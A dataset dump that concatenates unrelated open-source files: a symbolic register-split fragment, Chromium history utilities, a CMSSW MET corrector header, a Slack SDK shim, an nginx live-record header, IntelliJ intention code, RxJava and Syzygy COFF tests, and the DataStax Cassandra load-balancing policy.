ss.set(r2, ss[r0][2*to-1][1*to]);
ss.set(r3, ss[r0][3*to-1][2*to]);
ss.set(r4, ss[r0][4*to-1][3*to]);
}
return;
} else {
assert(from == 32);
assert(to == 128);
// assert(r0.size() == 128);
// assert(r1.size() == 128);
// assert(r2.size() == 128);
// assert(r3.size() == 128);
// assert(r4.size() == 128);
ss.set(r4, ss[r3][from-1][0] || ss[r2][from-1][0] || ss[r1][from-1][0] || ss[r0][from-1][0]);
return;
}
}
// 2 way split of vector register
regex split_move_2x_r(supported_regex_[9]);
if (regex_match(lbl, result, split_move_2x_r)) {
auto from = stoi(result[1]);
auto to = stoi(result[2]);
auto r0 = reg_map_.at(result[3]);
auto r1 = reg_map_.at(result[4]);
auto r2 = reg_map_.at(result[5]);
if (from > to) {
assert(from == 128);
assert(to == 64);
ss.set(r1, SymBitVector::constant(to, 0) || ss[r0][1*to-1][0*to]);
ss.set(r2, SymBitVector::constant(to, 0) || ss[r0][2*to-1][1*to]);
return;
} else {
assert(from == 64);
assert(to == 128);
ss.set(r2, ss[r1][from-1][0] || ss[r0][from-1][0]);
return;
}
}
std::cout << lbl << std::endl;
assert(false);
}
| 4,756 |
14,668 | // Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.chrome.browser.history;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import org.chromium.base.ContextUtils;
import org.chromium.chrome.browser.IntentHandler;
import org.chromium.chrome.browser.tab.Tab;
import org.chromium.components.embedder_support.util.UrlConstants;
import org.chromium.content_public.browser.LoadUrlParams;
import org.chromium.ui.base.DeviceFormFactor;
/**
* Utility methods for the browsing history manager.
*/
public class HistoryManagerUtils {
/**
* Opens the browsing history manager.
*
* @param activity The {@link Activity} that owns the {@link HistoryManager}.
* @param tab The {@link Tab} to used to display the native page version of the
* {@link HistoryManager}.
* @param isIncognitoSelected Whether the incognito {@TabModelSelector} is selected.
*/
public static void showHistoryManager(Activity activity, Tab tab, boolean isIncognitoSelected) {
Context appContext = ContextUtils.getApplicationContext();
if (DeviceFormFactor.isNonMultiDisplayContextOnTablet(activity)) {
// History shows up as a tab on tablets.
LoadUrlParams params = new LoadUrlParams(UrlConstants.NATIVE_HISTORY_URL);
tab.loadUrl(params);
} else {
Intent intent = new Intent();
intent.setClass(appContext, HistoryActivity.class);
intent.putExtra(IntentHandler.EXTRA_PARENT_COMPONENT, activity.getComponentName());
intent.putExtra(IntentHandler.EXTRA_INCOGNITO_MODE, isIncognitoSelected);
activity.startActivity(intent);
}
}
}
| 648 |
852 | <reponame>ckamtsikis/cmssw<gh_stars>100-1000
//
#ifndef METCorrectorParameters_h
#define METCorrectorParameters_h
#include "CondFormats/Serialization/interface/Serializable.h"
#include <string>
#include <vector>
#include <algorithm>
#include <iostream>
#include "FWCore/Utilities/interface/Exception.h"
#include "FWCore/MessageLogger/interface/MessageLogger.h"
class METCorrectorParameters {
//---------------- METCorrectorParameters class ----------------
//-- Encapsulates all the information of the parametrization ---
public:
//---------------- Definitions class ---------------------------
//-- Global iformation about the parametrization is kept here --
class Definitions {
public:
//-------- Constructors --------------
Definitions() {}
Definitions(const std::vector<std::string>& fVar,
const std::vector<std::string>& fParVar,
const std::string& fFormula);
Definitions(const std::string& fLine);
//-------- Member functions ----------
unsigned nBinVar() const { return mBinVar.size(); }
unsigned nParVar() const { return mParVar.size(); }
std::vector<std::string> parVar() const { return mParVar; }
std::vector<std::string> binVar() const { return mBinVar; }
std::string parVar(unsigned fIndex) const { return mParVar[fIndex]; }
std::string binVar(unsigned fIndex) const { return mBinVar[fIndex]; }
std::string formula() const { return mFormula; }
private:
//-------- Member variables ----------
int ptclType;
std::string mFormula;
std::vector<std::string> mParVar;
std::vector<std::string> mBinVar;
COND_SERIALIZABLE;
};
//---------------- Record class --------------------------------
//-- Each Record holds the properties of a bin -----------------
class Record {
public:
//-------- Constructors --------------
Record() : mNvar(0), mMin(0), mMax(0), mParameters(0) {}
Record(unsigned fNvar,
const std::vector<float>& fXMin,
const std::vector<float>& fXMax,
const std::vector<float>& fParameters)
: mNvar(fNvar), mMin(fXMin), mMax(fXMax), mParameters(fParameters) {}
Record(const std::string& fLine, unsigned fNvar);
//-------- Member functions ----------
float xMin(unsigned fVar) const { return mMin[fVar]; }
float xMax(unsigned fVar) const { return mMax[fVar]; }
float xMiddle(unsigned fVar) const { return 0.5 * (xMin(fVar) + xMax(fVar)); }
float parameter(unsigned fIndex) const { return mParameters[fIndex]; }
std::vector<float> parameters() const { return mParameters; }
unsigned nParameters() const { return mParameters.size(); }
int operator<(const Record& other) const { return xMin(0) < other.xMin(0); }
private:
//-------- Member variables ----------
unsigned mNvar;
std::vector<float> mMin;
std::vector<float> mMax;
std::vector<float> mParameters;
COND_SERIALIZABLE;
};
//-------- Constructors --------------
METCorrectorParameters() { valid_ = false; }
METCorrectorParameters(const std::string& fFile, const std::string& fSection = "");
METCorrectorParameters(const METCorrectorParameters::Definitions& fDefinitions,
const std::vector<METCorrectorParameters::Record>& fRecords)
: mDefinitions(fDefinitions), mRecords(fRecords) {
valid_ = true;
}
//-------- Member functions ----------
const Record& record(unsigned fBin) const { return mRecords[fBin]; }
const Definitions& definitions() const { return mDefinitions; }
unsigned size() const { return mRecords.size(); }
unsigned size(unsigned fVar) const;
int binIndex(const std::vector<float>& fX) const;
int neighbourBin(unsigned fIndex, unsigned fVar, bool fNext) const;
std::vector<float> binCenters(unsigned fVar) const;
void printScreen() const;
void printFile(const std::string& fFileName) const;
bool isValid() const { return valid_; }
private:
//-------- Member variables ----------
METCorrectorParameters::Definitions mDefinitions;
std::vector<METCorrectorParameters::Record> mRecords;
bool valid_; /// is this a valid set?
COND_SERIALIZABLE;
};
class METCorrectorParametersCollection {
public:
enum Level_t { MiniAod = 0, N_LEVELS = 1 };
typedef int key_type;
typedef std::string label_type;
typedef METCorrectorParameters value_type;
typedef std::pair<key_type, value_type> pair_type;
typedef std::vector<pair_type> collection_type;
// Constructor... initialize all three vectors to zero
METCorrectorParametersCollection() { correctionsMiniAod_.clear(); }
// Add a METCorrectorParameter object, for each source
void push_back(key_type i, value_type const& j, label_type const& source = "");
// Access the METCorrectorParameter via the key k.
// key_type is hashed to deal with the three collections
METCorrectorParameters const& operator[](key_type k) const;
// Access the METCorrectorParameter via a string.
// Will find the hashed value for the label, and call via that
// operator.
METCorrectorParameters const& operator[](std::string const& label) const { return operator[](findKey(label)); }
// Get a list of valid keys. These will contain hashed keys
// that are aware of all three collections.
void validKeys(std::vector<key_type>& keys) const;
// Helper method to find all of the sections in a given
// parameters file
static void getSections(std::string inputFile, std::vector<std::string>& outputs);
// Find the MiniAod bin for hashing
static key_type getMiniAodBin(std::string const& source);
static bool isMiniAod(key_type k);
static std::string findLabel(key_type k);
static std::string findMiniAodSource(key_type k);
protected:
// Find the key corresponding to each label
key_type findKey(std::string const& label) const;
collection_type correctionsMiniAod_;
COND_SERIALIZABLE;
};
#endif
| 1,902 |
2,486 | <filename>slack/__init__.py
import logging
from logging import NullHandler
from slack import deprecation
deprecation.show_message(__name__, "slack_sdk.web/webhook/rtm")
from slack_sdk.rtm import RTMClient # noqa
from slack_sdk.web.async_client import AsyncWebClient # noqa
from slack_sdk.web.legacy_client import LegacyWebClient as WebClient # noqa
from slack_sdk.webhook.async_client import AsyncWebhookClient # noqa
from slack_sdk.webhook.client import WebhookClient # noqa
# Set default logging handler to avoid "No handler found" warnings.
logging.getLogger(__name__).addHandler(NullHandler())
| 198 |
735 | <reponame>1443213244/small-package
/*
* Copyright (C) AlexWoo(<NAME>) <EMAIL>
*/
#ifndef _NGX_LIVE_RECORD_H_INCLUDED_
#define _NGX_LIVE_RECORD_H_INCLUDED_
#include <ngx_config.h>
#include <ngx_core.h>
#include "ngx_rtmp.h"
#include "hls/ngx_rtmp_mpegts.h"
typedef struct {
unsigned open; /* 0 close, 1 open, 2 wait for key */
time_t last_time;
ngx_file_t index;
ngx_rtmp_mpegts_file_t ts;
ngx_file_t file;
ngx_rtmp_publish_t pubv;
ngx_uint_t audio_cc;
ngx_uint_t video_cc;
ngx_msec_t begintime;
ngx_msec_t starttime;
ngx_msec_t endtime;
off_t startsize;
off_t endsize;
ngx_msec_t publish_epoch;
ngx_msec_t basetime;
} ngx_live_record_ctx_t;
typedef ngx_int_t (*ngx_live_record_start_pt)(ngx_rtmp_session_t *s);
typedef ngx_int_t (*ngx_live_record_update_pt)(ngx_rtmp_session_t *s);
typedef ngx_int_t (*ngx_live_record_done_pt)(ngx_rtmp_session_t *s);
extern ngx_live_record_start_pt ngx_live_record_start;
extern ngx_live_record_update_pt ngx_live_record_update;
extern ngx_live_record_done_pt ngx_live_record_done;
extern ngx_module_t ngx_live_record_module;
const char *ngx_live_record_open(ngx_rtmp_session_t *s);
const char *ngx_live_record_close(ngx_rtmp_session_t *s);
#endif
| 882 |
634 | <gh_stars>100-1000
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.codeInsight.intention.choice;
import com.intellij.codeInsight.daemon.impl.HighlightInfoType;
import com.intellij.codeInsight.intention.CustomizableIntentionAction;
import com.intellij.codeInsight.intention.IntentionAction;
import com.intellij.codeInspection.IntentionAndQuickFixAction;
import com.intellij.openapi.util.Iconable;
import consulo.ui.image.Image;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
* Intention action that is used as a variant of [IntentionActionWithChoice].
* <p>
* Action should implement [invoke], requests to [applyFix] would proxied to [invoke].
* <p>
* Actions requires [index] param so it can maintain order of variants in
* quick-fix popup.
*/
public abstract class ChoiceVariantIntentionAction extends IntentionAndQuickFixAction implements HighlightInfoType.Iconable, Iconable, CustomizableIntentionAction, Comparable<IntentionAction> {
public abstract int getIndex();
@Override
public boolean isSelectable() {
return true;
}
@Override
public boolean isShowSubmenu() {
return false;
}
@Override
public boolean isShowIcon() {
return true;
}
@Nullable
@Override
public Image getIcon() {
return Image.empty(Image.DEFAULT_ICON_SIZE);
}
@Nullable
@Override
public Image getIcon(@IconFlags int flags) {
return getIcon();
}
@Override
public int compareTo(@Nonnull IntentionAction other) {
if (!getFamilyName().equals(other.getFamilyName())) return this.getFamilyName().compareTo(other.getFamilyName());
if (other instanceof ChoiceTitleIntentionAction) {
return 1;
}
if (other instanceof ChoiceVariantIntentionAction) {
return this.getIndex() - ((ChoiceVariantIntentionAction)other).getIndex();
}
return 0;
}
}
| 615 |
303 | <gh_stars>100-1000
package com.github.davidmoten.rx.testing;
import java.util.concurrent.TimeUnit;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import rx.Observable;
import rx.functions.Func1;
import rx.schedulers.Schedulers;
public class OperatorCacheHelperTest extends TestCase {
private static final Func1<Observable<Integer>, Observable<Integer>> FUNCTION = new Func1<Observable<Integer>, Observable<Integer>>() {
@Override
public Observable<Integer> call(Observable<Integer> o) {
Observable<Integer> c = o.cache();
c.delay(100, TimeUnit.MILLISECONDS).subscribeOn(Schedulers.computation()).subscribe();
c.delay(50, TimeUnit.MILLISECONDS).subscribeOn(Schedulers.computation()).subscribe();
return c.delay(100, TimeUnit.MILLISECONDS).subscribeOn(Schedulers.computation());
}
};
public static TestSuite suite() {
return TestingHelper.function(FUNCTION)
// test empty
.name("testCacheOfEmptyReturnsEmpty").fromEmpty().expectEmpty()
//
.name("testCacheOfSomeReturnsSome").from(1, 2, 3, 4, 5).expect(1, 2, 3, 4, 5)
// get test suites
.testSuite(TestingHelperCountTest.class);
}
public void testDummy() {
// just here to fool eclipse
}
}
| 591 |
984 | /*
* Copyright DataStax, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.datastax.oss.driver.internal.core.loadbalancing;
import static java.util.concurrent.TimeUnit.MILLISECONDS;
import static java.util.concurrent.TimeUnit.MINUTES;
import com.datastax.oss.driver.api.core.config.DefaultDriverOption;
import com.datastax.oss.driver.api.core.config.DriverExecutionProfile;
import com.datastax.oss.driver.api.core.context.DriverContext;
import com.datastax.oss.driver.api.core.metadata.Node;
import com.datastax.oss.driver.api.core.session.Request;
import com.datastax.oss.driver.api.core.session.Session;
import com.datastax.oss.driver.api.core.tracker.RequestTracker;
import com.datastax.oss.driver.internal.core.loadbalancing.helper.MandatoryLocalDcHelper;
import com.datastax.oss.driver.internal.core.pool.ChannelPool;
import com.datastax.oss.driver.internal.core.session.DefaultSession;
import com.datastax.oss.driver.internal.core.util.ArrayUtils;
import com.datastax.oss.driver.internal.core.util.collection.QueryPlan;
import com.datastax.oss.driver.internal.core.util.collection.SimpleQueryPlan;
import edu.umd.cs.findbugs.annotations.NonNull;
import edu.umd.cs.findbugs.annotations.Nullable;
import java.util.BitSet;
import java.util.Map;
import java.util.Optional;
import java.util.Queue;
import java.util.Set;
import java.util.UUID;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ThreadLocalRandom;
import java.util.concurrent.atomic.AtomicLongArray;
import net.jcip.annotations.ThreadSafe;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* The default load balancing policy implementation.
*
* <p>To activate this policy, modify the {@code basic.load-balancing-policy} section in the driver
* configuration, for example:
*
* <pre>
* datastax-java-driver {
* basic.load-balancing-policy {
* class = DefaultLoadBalancingPolicy
* local-datacenter = datacenter1
* }
* }
* </pre>
*
* See {@code reference.conf} (in the manual or core driver JAR) for more details.
*
* <p><b>Local datacenter</b>: This implementation requires a local datacenter to be defined,
* otherwise it will throw an {@link IllegalStateException}. A local datacenter can be supplied
* either:
*
* <ol>
* <li>Programmatically with {@link
* com.datastax.oss.driver.api.core.session.SessionBuilder#withLocalDatacenter(String)
* SessionBuilder#withLocalDatacenter(String)};
* <li>Through configuration, by defining the option {@link
* DefaultDriverOption#LOAD_BALANCING_LOCAL_DATACENTER
* basic.load-balancing-policy.local-datacenter};
* <li>Or implicitly, if and only if no explicit contact points were provided: in this case this
* implementation will infer the local datacenter from the implicit contact point (localhost).
* </ol>
*
* <p><b>Query plan</b>: This implementation prioritizes replica nodes over non-replica ones; if
* more than one replica is available, the replicas will be shuffled; if more than 2 replicas are
* available, they will be ordered from most healthy to least healthy ("Power of 2 choices" or busy
* node avoidance algorithm). Non-replica nodes will be included in a round-robin fashion. If the
* local datacenter is defined (see above), query plans will only include local nodes, never remote
* ones; if it is unspecified however, query plans may contain nodes from different datacenters.
*/
@ThreadSafe
public class DefaultLoadBalancingPolicy extends BasicLoadBalancingPolicy implements RequestTracker {
private static final Logger LOG = LoggerFactory.getLogger(DefaultLoadBalancingPolicy.class);
private static final long NEWLY_UP_INTERVAL_NANOS = MINUTES.toNanos(1);
private static final int MAX_IN_FLIGHT_THRESHOLD = 10;
private static final long RESPONSE_COUNT_RESET_INTERVAL_NANOS = MILLISECONDS.toNanos(200);
protected final Map<Node, AtomicLongArray> responseTimes = new ConcurrentHashMap<>();
protected final Map<Node, Long> upTimes = new ConcurrentHashMap<>();
private final boolean avoidSlowReplicas;
public DefaultLoadBalancingPolicy(@NonNull DriverContext context, @NonNull String profileName) {
super(context, profileName);
this.avoidSlowReplicas =
profile.getBoolean(DefaultDriverOption.LOAD_BALANCING_POLICY_SLOW_AVOIDANCE, true);
}
@NonNull
@Override
public Optional<RequestTracker> getRequestTracker() {
if (avoidSlowReplicas) {
return Optional.of(this);
} else {
return Optional.empty();
}
}
@NonNull
@Override
protected Optional<String> discoverLocalDc(@NonNull Map<UUID, Node> nodes) {
return new MandatoryLocalDcHelper(context, profile, logPrefix).discoverLocalDc(nodes);
}
@NonNull
@Override
public Queue<Node> newQueryPlan(@Nullable Request request, @Nullable Session session) {
if (!avoidSlowReplicas) {
return super.newQueryPlan(request, session);
}
// Take a snapshot since the set is concurrent:
Object[] currentNodes = getLiveNodes().dc(getLocalDatacenter()).toArray();
Set<Node> allReplicas = getReplicas(request, session);
int replicaCount = 0; // in currentNodes
if (!allReplicas.isEmpty()) {
// Move replicas to the beginning of the plan
for (int i = 0; i < currentNodes.length; i++) {
Node node = (Node) currentNodes[i];
if (allReplicas.contains(node)) {
ArrayUtils.bubbleUp(currentNodes, i, replicaCount);
replicaCount++;
}
}
if (replicaCount > 1) {
shuffleHead(currentNodes, replicaCount);
if (replicaCount > 2) {
assert session != null;
// Test replicas health
Node newestUpReplica = null;
BitSet unhealthyReplicas = null; // bit mask storing indices of unhealthy replicas
long mostRecentUpTimeNanos = -1;
long now = nanoTime();
for (int i = 0; i < replicaCount; i++) {
Node node = (Node) currentNodes[i];
assert node != null;
Long upTimeNanos = upTimes.get(node);
if (upTimeNanos != null
&& now - upTimeNanos - NEWLY_UP_INTERVAL_NANOS < 0
&& upTimeNanos - mostRecentUpTimeNanos > 0) {
newestUpReplica = node;
mostRecentUpTimeNanos = upTimeNanos;
}
if (newestUpReplica == null && isUnhealthy(node, session, now)) {
if (unhealthyReplicas == null) {
unhealthyReplicas = new BitSet(replicaCount);
}
unhealthyReplicas.set(i);
}
}
// When:
// - there isn't any newly UP replica and
// - there is one or more unhealthy replicas and
// - there is a majority of healthy replicas
int unhealthyReplicasCount =
unhealthyReplicas == null ? 0 : unhealthyReplicas.cardinality();
if (newestUpReplica == null
&& unhealthyReplicasCount > 0
&& unhealthyReplicasCount < (replicaCount / 2.0)) {
// Reorder the unhealthy replicas to the back of the list
// Start from the back of the replicas, then move backwards;
// stop once all unhealthy replicas are moved to the back.
int counter = 0;
for (int i = replicaCount - 1; i >= 0 && counter < unhealthyReplicasCount; i--) {
if (unhealthyReplicas.get(i)) {
ArrayUtils.bubbleDown(currentNodes, i, replicaCount - 1 - counter);
counter++;
}
}
}
// When:
// - there is a newly UP replica and
// - the replica in first or second position is the most recent replica marked as UP and
// - dice roll 1d4 != 1
else if ((newestUpReplica == currentNodes[0] || newestUpReplica == currentNodes[1])
&& diceRoll1d4() != 1) {
// Send it to the back of the replicas
ArrayUtils.bubbleDown(
currentNodes, newestUpReplica == currentNodes[0] ? 0 : 1, replicaCount - 1);
}
// Reorder the first two replicas in the shuffled list based on the number of
// in-flight requests
if (getInFlight((Node) currentNodes[0], session)
> getInFlight((Node) currentNodes[1], session)) {
ArrayUtils.swap(currentNodes, 0, 1);
}
}
}
}
LOG.trace("[{}] Prioritizing {} local replicas", logPrefix, replicaCount);
// Round-robin the remaining nodes
ArrayUtils.rotate(
currentNodes,
replicaCount,
currentNodes.length - replicaCount,
roundRobinAmount.getAndUpdate(INCREMENT));
QueryPlan plan = currentNodes.length == 0 ? QueryPlan.EMPTY : new SimpleQueryPlan(currentNodes);
return maybeAddDcFailover(request, plan);
}
@Override
public void onNodeSuccess(
@NonNull Request request,
long latencyNanos,
@NonNull DriverExecutionProfile executionProfile,
@NonNull Node node,
@NonNull String logPrefix) {
updateResponseTimes(node);
}
@Override
public void onNodeError(
@NonNull Request request,
@NonNull Throwable error,
long latencyNanos,
@NonNull DriverExecutionProfile executionProfile,
@NonNull Node node,
@NonNull String logPrefix) {
updateResponseTimes(node);
}
/** Exposed as a protected method so that it can be accessed by tests */
protected long nanoTime() {
return System.nanoTime();
}
/** Exposed as a protected method so that it can be accessed by tests */
protected int diceRoll1d4() {
return ThreadLocalRandom.current().nextInt(4);
}
protected boolean isUnhealthy(@NonNull Node node, @NonNull Session session, long now) {
return isBusy(node, session) && isResponseRateInsufficient(node, now);
}
protected boolean isBusy(@NonNull Node node, @NonNull Session session) {
return getInFlight(node, session) >= MAX_IN_FLIGHT_THRESHOLD;
}
protected boolean isResponseRateInsufficient(@NonNull Node node, long now) {
// response rate is considered insufficient when less than 2 responses were obtained in
// the past interval delimited by RESPONSE_COUNT_RESET_INTERVAL_NANOS.
if (responseTimes.containsKey(node)) {
AtomicLongArray array = responseTimes.get(node);
if (array.length() == 2) {
long threshold = now - RESPONSE_COUNT_RESET_INTERVAL_NANOS;
long leastRecent = array.get(0);
return leastRecent - threshold < 0;
}
}
return true;
}
protected void updateResponseTimes(@NonNull Node node) {
responseTimes.compute(
node,
(n, array) -> {
// The array stores at most two timestamps, since we don't need more;
// the first one is always the least recent one, and hence the one to inspect.
long now = nanoTime();
if (array == null) {
array = new AtomicLongArray(1);
array.set(0, now);
} else if (array.length() == 1) {
long previous = array.get(0);
array = new AtomicLongArray(2);
array.set(0, previous);
array.set(1, now);
} else {
array.set(0, array.get(1));
array.set(1, now);
}
return array;
});
}
protected int getInFlight(@NonNull Node node, @NonNull Session session) {
// The cast will always succeed because there's no way to replace the internal session impl
ChannelPool pool = ((DefaultSession) session).getPools().get(node);
// Note: getInFlight() includes orphaned ids, which is what we want as we need to account
// for requests that were cancelled or timed out (since the node is likely to still be
// processing them).
return (pool == null) ? 0 : pool.getInFlight();
}
}
| 4,563 |
343 | <reponame>nzeh/syzygy
// Copyright 2014 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "syzygy/pe/coff_utils.h"
#include "base/bind.h"
#include "gmock/gmock.h"
#include "gtest/gtest.h"
#include "syzygy/pe/unittest_util.h"
namespace pe {
namespace {
using block_graph::BlockGraph;
using testing::_;
using testing::Return;
static const char kFunction2[] = "?function2@@YAHXZ";
static const char kDebugS[] = ".debug$S";
class LenientCoffUtilsTest : public testing::CoffUnitTest {
public:
MOCK_METHOD3(VisitCoffSymbol, bool(BlockGraph::Block*,
BlockGraph::Block*,
BlockGraph::Offset));
};
typedef testing::StrictMock<LenientCoffUtilsTest> CoffUtilsTest;
typedef std::set<std::string> StringSet;
bool VisitCoffSymbolAndGrabName(StringSet* names,
BlockGraph::Block* symbols_block,
BlockGraph::Block* strings_block,
BlockGraph::Offset symbol_offset) {
DCHECK_NE(reinterpret_cast<StringSet*>(NULL), names);
DCHECK_NE(reinterpret_cast<BlockGraph::Block*>(NULL), symbols_block);
DCHECK_NE(reinterpret_cast<BlockGraph::Block*>(NULL), strings_block);
base::StringPiece name;
EXPECT_TRUE(GetCoffSymbolName(symbols_block, strings_block, symbol_offset,
&name));
EXPECT_FALSE(name.empty());
names->insert(name.as_string());
return true;
}
} // namespace
TEST_F(CoffUtilsTest, FindCoffSpecialBlocks) {
BlockGraph::Block* actual_headers_block = NULL;
BlockGraph::Block* actual_symbols_block = NULL;
BlockGraph::Block* actual_strings_block = NULL;
BlockGraph::Block* headers_block =
block_graph_.AddBlock(
BlockGraph::DATA_BLOCK,
sizeof(IMAGE_FILE_HEADER) + 12 * sizeof(IMAGE_SECTION_HEADER),
"COFF Headers");
ASSERT_TRUE(headers_block != NULL);
headers_block->set_attribute(BlockGraph::COFF_HEADERS);
// FindCoffSpecialBlocks() should fail even if we don't request the other
// special blocks.
EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
&actual_headers_block,
&actual_symbols_block,
&actual_strings_block));
EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
&actual_headers_block, NULL, NULL));
BlockGraph::Block* symbols_block =
block_graph_.AddBlock(BlockGraph::DATA_BLOCK,
30 * sizeof(IMAGE_SYMBOL),
"COFF Symbol Table");
ASSERT_TRUE(symbols_block != NULL);
symbols_block->set_attribute(BlockGraph::COFF_SYMBOL_TABLE);
EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
&actual_headers_block,
&actual_symbols_block,
&actual_strings_block));
EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
&actual_headers_block,
&actual_symbols_block,
NULL));
BlockGraph::Block* strings_block =
block_graph_.AddBlock(BlockGraph::DATA_BLOCK, 242, "COFF String Table");
ASSERT_TRUE(strings_block != NULL);
strings_block->set_attribute(BlockGraph::COFF_STRING_TABLE);
EXPECT_TRUE(FindCoffSpecialBlocks(&block_graph_,
&actual_headers_block,
&actual_symbols_block,
&actual_strings_block));
EXPECT_EQ(headers_block, actual_headers_block);
EXPECT_EQ(symbols_block, actual_symbols_block);
EXPECT_EQ(strings_block, actual_strings_block);
}
TEST_F(CoffUtilsTest, VisitCoffSymbols) {
ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
BlockGraph::Block* symbols_block = NULL;
BlockGraph::Block* strings_block = NULL;
ASSERT_TRUE(FindCoffSpecialBlocks(&block_graph_,
NULL,
&symbols_block,
&strings_block));
VisitCoffSymbolCallback callback = base::Bind(
&CoffUtilsTest::VisitCoffSymbol, base::Unretained(this));
// Expect the visitor to fail if the callback does.
EXPECT_CALL(*this, VisitCoffSymbol(symbols_block,
strings_block,
_)).WillOnce(Return(false));
EXPECT_FALSE(VisitCoffSymbols(callback, &block_graph_));
// Now expect the visitor to succeed.
EXPECT_CALL(*this, VisitCoffSymbol(symbols_block,
strings_block,
_)).
WillRepeatedly(Return(true));
EXPECT_TRUE(VisitCoffSymbols(callback, &block_graph_));
}
TEST_F(CoffUtilsTest, GetCoffSymbolName) {
ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
StringSet names;
VisitCoffSymbolCallback callback = base::Bind(
&VisitCoffSymbolAndGrabName, base::Unretained(&names));
EXPECT_TRUE(VisitCoffSymbols(callback, &block_graph_));
EXPECT_FALSE(names.empty());
}
TEST_F(CoffUtilsTest, FindCoffSymbolInvalid) {
ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
CoffSymbolOffsets offsets;
EXPECT_TRUE(FindCoffSymbol("_foo_bar_baz", &block_graph_, &offsets));
EXPECT_TRUE(offsets.empty());
}
TEST_F(CoffUtilsTest, FindCoffSymbolDuplicate) {
ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
CoffSymbolOffsets offsets;
EXPECT_TRUE(FindCoffSymbol(kDebugS, &block_graph_, &offsets));
EXPECT_LT(1u, offsets.size());
}
TEST_F(CoffUtilsTest, FindCoffSymbolUnique) {
ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
CoffSymbolOffsets offsets;
EXPECT_TRUE(FindCoffSymbol(kFunction2, &block_graph_, &offsets));
EXPECT_EQ(1u, offsets.size());
}
TEST_F(CoffUtilsTest, BuildCoffSymbolNameOffsetMap) {
ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
CoffSymbolNameOffsetMap map;
EXPECT_TRUE(BuildCoffSymbolNameOffsetMap(&block_graph_, &map));
EXPECT_FALSE(map.empty());
CoffSymbolNameOffsetMap::const_iterator it = map.find("_foo_bar_baz");
EXPECT_TRUE(it == map.end());
it = map.find(kFunction2);
ASSERT_TRUE(it != map.end());
EXPECT_FALSE(it->second.empty());
it = map.find(kDebugS);
ASSERT_TRUE(it != map.end());
EXPECT_LT(1u, it->second.size());
}
} // namespace pe
| 3,133 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.